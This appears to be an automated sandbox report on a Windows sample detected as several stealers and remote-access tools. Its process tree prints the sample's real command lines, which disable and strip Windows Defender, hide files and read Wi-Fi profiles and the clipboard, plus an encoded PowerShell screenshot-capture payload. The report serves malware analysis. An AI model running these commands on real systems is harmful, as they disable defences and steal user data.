Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1578555
MD5:cd7686b11754d77b8722880a1a3a9a43
SHA1:ea1c00d2985812539452a31d8f75506573dad692
SHA256:a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944
Tags:exeuser-Bitsight
Infos:

Detection

NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Amadeys stealer DLL
Yara detected Blank Grabber
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
PE file contains section with special chars
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Removes signatures from Windows Defender
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5784 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CD7686B11754D77B8722880A1A3A9A43)
    • skotes.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: CD7686B11754D77B8722880A1A3A9A43)
      • D1UL0FG.exe (PID: 5160 cmdline: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" MD5: 63EFECD388A74A9CDEB79CD7C8020E7E)
        • D1UL0FG.exe (PID: 6716 cmdline: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" MD5: 63EFECD388A74A9CDEB79CD7C8020E7E)
          • cmd.exe (PID: 1536 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6396 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 2164 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 5820 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
            • MpCmdRun.exe (PID: 6396 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
          • cmd.exe (PID: 1372 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 2128 cmdline: attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2704 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7344 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7216 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7316 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7452 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 8004 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7964 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7940 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7680 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 8020 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • systeminfo.exe (PID: 7948 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 8092 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 7256 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7500 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 5604 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7584 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
              • csc.exe (PID: 7784 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                • cvtres.exe (PID: 7728 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 2672 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • cmd.exe (PID: 4996 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 1632 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 8152 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
